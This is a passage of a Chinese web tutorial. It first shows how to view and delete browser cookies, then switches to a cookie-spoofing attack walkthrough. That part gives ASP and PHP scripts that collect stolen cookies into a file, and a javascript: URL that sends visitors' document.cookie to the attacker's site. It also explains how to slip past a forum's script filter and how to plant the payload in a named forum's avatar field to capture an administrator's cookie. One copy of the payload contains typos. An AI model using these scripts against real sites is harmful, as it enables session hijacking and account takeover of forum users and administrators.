二、查看Cookie方法
要查看Cookie,你可以启动IE,点击菜单“工具”→“Internet选项”,在“常规”选项卡中点“设置”→“查看文件”,即可看到你硬盘中所有的Cookie文件,这些TXT文件通常以<XP用户名>@domain格式命名,domain是你访问过的网站域名。
此外,你也可以使用IECookieView来查看、修改删除或保存Cookie文件。启动IECookieView,软件上半部窗口会列出你登录过的网站信息,其中Hits列记录了Cookie被网站读取的次数;选中某个网站(例如35me.cn),在下面窗口中就会列出该站生成的Cookie内容,有KEY、Value、Domain、Created In等列,其中Created In列的值如果为Client,表示该Cookie是网页中的JavaScript or VBScript代码生成的,如为Server,则是网页中的JAVA、asp.net、asp、php、jsp代码创建的(即服务器端运行的程序生成的);Value列中一般存放用户名、用户ID、访问次数、访问来路网址等信息,通过查看Value列,你可以发现一些个人隐私,例如网站的登录用户名、密码等。为此,建议你在公共场所上网后,要运行IECookieView,点击菜单“Destroy All Except The Selected Cookies”删除全部Cookie文件,以免帐号、密码等隐私信息外泄。
三、Cookie欺骗攻击案例
Cookie欺骗是常见的攻击网站方式,所谓Cookie欺骗,就是将别人的Cookie向服务器提交,冒充别人的身份登录网站。要用Cookie欺骗攻击某站,首先需要获得该站管理员的Cookie,方法如下:
1、获得管理员Cookie
(1)收集Cookie程序
用FrontPage2003写一个收集别人Cookie的程序Cookies.asp,代码如下:
<%
testfile=Server.MapPath("cookmm.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>
将它上传到你的网站空间中(网站空间要支持ASP运行),以后访问者只要执行了该程序,他的Cookie就会被收集到cookmm.txt文件中;为了能同时显示被攻击站首页,在Cookies.asp中还应增加以下代码:
<script language=vbscript>
window.location.href="http://<被攻击站的域名>"
</script>
以上是ASP代码,具有同样功能的Cookies.php程序,代码如下:
<?php
\$info = getenv("QUERY_STRING");
if (\$info) {
\$fp = fopen("Cookies.txt","a");
fwrite(\$fp,\$info."\n");
fclose(\$fp);
}
header("Location: http://<被攻击站的域名>");
?>
(2)在论坛中发帖
在论坛中发帖,诱使别人点击帖内URL,只要访问者点击了该URL,他登录论坛时产生的Cookie就会保存在cookmm.txt文件中,URL代码如下:
javascript:window.open(‘http://<你的网站域名>/Cookies.asp?msg=’+document.Cookie)
msg后边的document.Cookie表示访问此帖用户的Cookie,如果论坛过滤javascript字符,则在帖子中将javascript写成ASCII码(比如j写成“j”)
例如黑鹰论坛有头像漏洞,如果要攻击可以在论坛中发帖,在论坛的头像地址中输入如下代码: javascript:windows.open('http://<你的网站域名>/ Cookies.asp?msg='+documents.Cookie)写好了后提交,然后在论坛上发帖子,只要管理员浏览你的帖子,即可拿到他的Cookie,他登录论坛时产生的Cookie会保存在cookmm.txt文件中!
- 第1页:Cookie是什么
- 第2页:查看Cookie方法